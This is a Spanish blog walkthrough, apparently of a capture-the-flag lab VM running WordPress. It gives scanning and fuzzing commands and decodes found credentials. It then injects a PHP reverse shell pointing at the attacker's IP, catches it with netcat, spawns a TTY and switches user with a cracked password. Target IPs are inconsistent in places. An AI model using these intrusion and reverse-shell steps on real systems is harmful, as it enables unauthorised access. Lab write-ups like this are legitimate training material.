Estuve escaneando sus puertos y nos muestra el puerto 443, 80 abierto entonces mi idea fue que puede ser que este montado un servidor web. En el cual hice una búsqueda de directorio con DIRB y me arrojo un wordpress.
nmap -sV -sC 192.168.1.7
dirb http://192.168.1.7
No me quede tan feliz que le hice un escaneo con nikto
nikto -h 192.168.1.7 -p 443
nikto -h 192.168.1.7
Pero con Nikto tuve mucha suerte.
Encontramos útil.
http://192.168.1.7/robots.txt
Buscamos el directorio con el diccionario
wfuzz -w /root/Downloads/fsocity.dic --sc=200 http://192.168.1.7/FUZZ
Ahora cuando encontramos "license"
Vamos a decodificar esta codificación base64.
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
Si tienes problemas en decodificar puedes hacer online. Pincha Aquí.Ahora iniciamos sesión a wordpress y vamos a modificar o inyectar tu shell en un plugin.
http://192.168.1.5/wp-content/plugins/hello.php
Sino sabes las ubicaciones puedes usar
wpscan -u 192.168.1.5 --enumerate p
Ahora encontramos una KEY
robot:c3fcd3d76192e4007dfb496cca67e13b
Desciframos MD5
robot:c3fcd3d76192e4007dfb496cca67e13b
MD5 = abcdefghijklmnopqrstuvwxyzLuego editamos un index.php para ejecutar nuestra php reverse. Y lo editamos y copiamos el siguiente código
Modificamos esta parte del código
$ip = '192.168.1.3'; // CHANGE THIS
$port = 6663; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = '/bin/sh -i';
$daemon = 0;
$debug = 0;
Y ejecutamos en la terminal
nc -lvp 6663
Mientras que también abrimos la URL.
Recuerda siempre el puerto para hacer el reverse. Luego corremos nuestro reverse a python
python -c 'import pty;pty.spawn("/bin/bash");'
su robot
Ahora te pide la contraseña pero como anteriormente desciframos un MD5 robot:XXXX
Listo, ingresamos en modo root
cat key-2-of-3.txt
KEY : 822c73956184f694993bede3eb39f959LISTO CREADPAG he terminado el CTF. Espero haberte dado una idea. Recuerda hay cosas que puedes crearte.
1 Comments
Gracias, señor, por tomarse el tiempo para compartir el conocimiento. Su forma de explicar el tema es bastante simple y comprensiva. Aquí hay un sitio web, me gustaría sugerir una herramienta para decodificar y codificar base64, esa herramienta es url-decode.com/tool / base64-decode . En realidad, ese enlace contiene las herramientas relacionadas con la decodificación y codificación (URL, base64), utilidades de números, convertidor de unidades, desarrolladores, utilidades de cadena, convertidor y herramientas de IP en un solo dominio. Por lo tanto, definitivamente te ayudará en tus proyectos futuros.
ReplyDelete